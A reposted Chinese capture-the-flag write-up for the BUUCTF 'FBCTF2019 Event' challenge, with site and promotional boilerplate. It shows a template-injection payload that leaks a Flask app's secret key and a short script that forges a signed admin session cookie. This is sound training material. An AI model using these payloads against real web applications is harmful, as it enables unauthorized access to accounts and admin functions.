BUUCTF:[FBCTF2019]Event-解题步骤详解

admin 2022年5月26日02:29:30评论77 views字数 960阅读3分12秒阅读模式

BUUCTF:[FBCTF2019]Event-解题步骤详解题目地址:

https://buuoj.cn/challenges#[FBCTF2019]Event

BUUCTF:[FBCTF2019]Event-解题步骤详解

BUUCTF:[FBCTF2019]Event-解题步骤详解

BUUCTF:[FBCTF2019]Event-解题步骤详解

模版注入+Cookie伪造

Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU

加密方式未知,密钥未知

在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显

BUUCTF:[FBCTF2019]Event-解题步骤详解

接着查找配置文件:__class__.__init__.__globals__[app].config

BUUCTF:[FBCTF2019]Event-解题步骤详解

发现密钥,开始伪造Cookie

from flask import Flaskfrom flask.sessions import SecureCookieSessionInterfaceapp = Flask(__name__)app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)@app.route('/')def index():    print(session_serializer.dumps("admin"))index()

PS C:UsersAdministratorDesktop> python .exp.pyImFkbWluIg.XyDKIw.wlPGRJ52VIGmXV5buLQ9-h-wt8w

将生成的Cookie替换user中的Cookie然后访问Admin panel

BUUCTF:[FBCTF2019]Event-解题步骤详解


原文来自CSDN博主「末 初」|侵删




BUUCTF:[FBCTF2019]Event-解题步骤详解

BUUCTF:[FBCTF2019]Event-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习BUUCTF:[FBCTF2019]Event-解题步骤详解BUUCTF:[FBCTF2019]Event-解题步骤详解。想加入我们就给我们留言吧BUUCTF:[FBCTF2019]Event-解题步骤详解

BUUCTF:[FBCTF2019]Event-解题步骤详解

BUUCTF:[FBCTF2019]Event-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

BUUCTF:[FBCTF2019]Event-解题步骤详解


原文始发于微信公众号(寰宇卫士):BUUCTF:[FBCTF2019]Event-解题步骤详解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月26日02:29:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BUUCTF:[FBCTF2019]Event-解题步骤详解https://cn-sec.com/archives/1047736.html

发表评论

匿名网友 填写信息